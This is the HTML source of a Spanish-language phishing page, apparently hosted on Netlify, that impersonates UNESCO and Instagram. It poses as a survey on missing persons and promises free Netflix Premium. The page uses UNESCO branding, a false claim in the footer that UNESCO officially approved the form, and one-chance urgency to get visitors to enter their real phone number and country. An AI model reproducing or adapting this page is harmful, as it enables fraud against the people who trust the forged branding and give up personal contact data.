<!DOCTYPE html>
<html lang="es">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
        <title>UNESCO: Tu opinión importa y tiene recompensa, participa ya</title>
        <meta name="description" content="Conozca más sobre la función, la visión y los resultados de la UNESCO. La UNESCO es la Organización de las Naciones Unidas para la Educación, la Ciencia y la Cultura. Nuestro objetivo es promover la paz y la seguridad mediante la cooperación internacional.">
        <meta property="og:url" content="https://unesco-encuesta-participa.netlify.app">
        <meta property="og:type" content="website">
        <meta property="og:title" content="UNESCO: Tu opinión importa y tiene recompensa, participa ya">
        <meta property="og:description" content="Conozca más sobre la función, la visión y los resultados de la UNESCO. La UNESCO es la Organización de las Naciones Unidas para la Educación, la Ciencia y la Cultura. Nuestro objetivo es promover la paz y la seguridad mediante la cooperación internacional.">
        <meta property="og:image" content="https://unesco-encuesta-participa.netlify.app/images/og2.jpg?v=202539">
        <!--meta property="og:image:width" content="1200">
        <meta property="og:image:height" content="628">-->
        
        <meta name="twitter:card" content="summary_large_image">
        <meta property="twitter:domain" content="unesco-encuesta-participa.netlify.app">
        <meta property="twitter:url" content="https://unesco-encuesta-participa.netlify.app">
        <meta name="twitter:title" content="UNESCO: Tu opinión importa y tiene recompensa, participa ya">
        <meta name="twitter:description" content="Conozca más sobre la función, la visión y los resultados de la UNESCO. La UNESCO es la Organización de las Naciones Unidas para la Educación, la Ciencia y la Cultura. Nuestro objetivo es promover la paz y la seguridad mediante la cooperación internacional.">
        <meta name="twitter:image" content="https://unesco-encuesta-participa.netlify.app/images/og2.jpg?v=202539">

        <link rel="stylesheet" href="style.css" type="text/css" />
        
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&display=swap" rel="stylesheet">
        
        <!--link rel="icon" type="image/png" href="images/favicon-96x96.png" sizes="96x96" /-->
        <link rel="icon" type="image/svg+xml" href="images/favicon.svg" />
        <link rel="shortcut icon" href="favicon.ico" />
        <link rel="apple-touch-icon" sizes="180x180" href="images/apple-touch-icon.png" />
        
    </head>

    <body>

        <div id="modal" style="position: fixed; top: 0; left: 0; bottom: 0; width: 100%; height: 100%; background-color: var(--color-bg); display: flex; justify-content: center; align-items: center; z-index: 1000;">
            <div style="background-color: white; border-radius: 26px; padding: 20px; max-width: 390px; width: 85%; text-align: left; position: relative;">
                <h2 style="margin: 0 0 10px 0; font-size: 22px; color: var(--color-azul); font-weight: 600; pointer-events: none;">
                    <strong translate="no">UNESCO: </strong>encuestas
                </h2>
                <p style="margin: 0 0 10px 0; font-size: 15.7px; pointer-events: none;">
                    Completa esta breve encuesta sobre personas desaparecidas en América y en el mundo. Tu participación es anónima y, al finalizar correctamente, recibirás tu recompensa.<br>
                    <strong>Ayúdanos</strong> &#x1F499;
                </p>
                <div style="display: flex; flex-direction: column; align-items: center; text-align: center; gap: 5px; background-color: transparent; border-radius: 0 25px 0 25px; padding: 8px 10px; width: 100%; max-width: 100%; margin-bottom: 20px; border: 2px solid red; user-select: none; pointer-events: none;">
                    <p style="color: rgba(0, 0, 0, 0.8); font-size: 11.8px; margin: 0; font-weight: 500;">Recompensa</p>
                    <h5 style="color: red; font-size: 20.5px; margin: 0;">Netflix Premium Gratis</h5>
                </div>
                <button onclick="document.getElementById('modal').style.display='none'" style="padding: 13px 20px; background-color: var(--color-azul); color: white; border: none; border-radius: 12px; cursor: pointer; font-size: 16px; width: 100%; max-width: 100%; text-align: center; font-weight: 500; font-family: inherit; user-select: none;">Comenzar</button>
            </div>
        </div>


        
        <div class="container" style="flex: 1; display: flex; flex-direction: column; min-height: 100%;">
            <header>
                <img src="images/unesco.svg" alt="" id="logo">
                <h2>Personas Desaparecidas en América: Una Iniciativa de UNESCO e Instagram</h2>

                <p><a href="#" style="font-weight: 700; color: inherit; cursor: pointer;">UNESCO,</a> junto con Instagram invita a participar en encuestas rápidas sobre el aumento de personas desaparecidas en América y el mundo, y el uso de redes sociales en su búsqueda. Tu participación es anónima y clave para ayudar a crear mejores soluciones.</p>
                <div style="display: flex; flex-direction: column; align-items: center; text-align: center; gap: 5px; background-color: red; border-radius: 0 25px 0 25px; padding: 8px 10px; width: 100%; max-width: 100%; margin-top: 3px;">
                    <p style="color: rgba(255, 255, 255, 0.8); font-size: 14.8px; margin: 0; font-weight: 500;">Recompensa</p>
                    <h5 style="color: white; font-size: 23.5px; margin: 0;">Netflix Premium Gratis</h5>
                </div>
                
                <p id="fecha"></p>
            </header>
            <section class="survey-section">
                <div class="question-box">
                    <!--p>¿?</p>
                    <label><input type="radio" name="answer" value="si"> Sí</label>
                    <label><input type="radio" name="answer" value="no"> No</label>-->
                </div>

                <div id="div-none" class="none-flex" style="display: none; flex-direction: column; gap: 5px; padding: 16px 24px; background-color: var(--color-blanco); max-width: 100%;">
                    <p style="font-size: 17.3px; font-weight: 600; color: var(--color-azul);">¡Gracias por completar la encuesta!</p>
                    <p style="font-weight: 500; font-size: 16px; margin: 6px 0;">Para recibir tu código de <strong>Netflix Premium Gratis</strong>, ingresa cuidadosamente tu país y número de celular reales para recibirlo.<br><strong>Solo tendrás una oportunidad,</strong> así que asegúrate de poner tus datos correctamente antes de pulsar el botón de abajo.</p>
                    <label for="celular" style="font-weight: 400; font-size: 14.5px; font-family: 'Inter', sans-serif;">Número de celular:</label>
                    <input class="input-p-n" type="tel" id="celular" maxlength="17" name="celular" inputmode="numeric" placeholder="Escribe tu número" required style="margin-bottom: 10px;" />
                    <label for="pais" style="font-weight: 400; font-size: 14.5px; font-family: 'Inter', sans-serif;">País:</label>
                    <input class="input-p-n" type="text" id="pais" maxlength="50" name="pais" placeholder="Escribe tu país" required />
                </div>


                
                <button class="boton" onclick="nextQuestion()">Siguiente</button>
            </section>
            <footer>
                <p>UNESCO estará haciendo llegar esta encuesta a diversas personas en los próximos días. (Podrás recibir encuestas repetidas).</p>
                <p>Este formulario ha sido creado y aprobado oficialmente por la Organización de las Naciones Unidas para la Educación, la Ciencia y la Cultura (UNESCO). Si detectas un uso indebido, te invitamos a notificarlo a través de nuestros canales oficiales.</p>
                <p style="font-size: 21px; font-weight: 600; align-self: center; color: gray; margin-top: 8px;">UNESCO Formularios</p>
            </footer>
        </div>
        <script src="main.js" defer></script>
    </body>
</html>
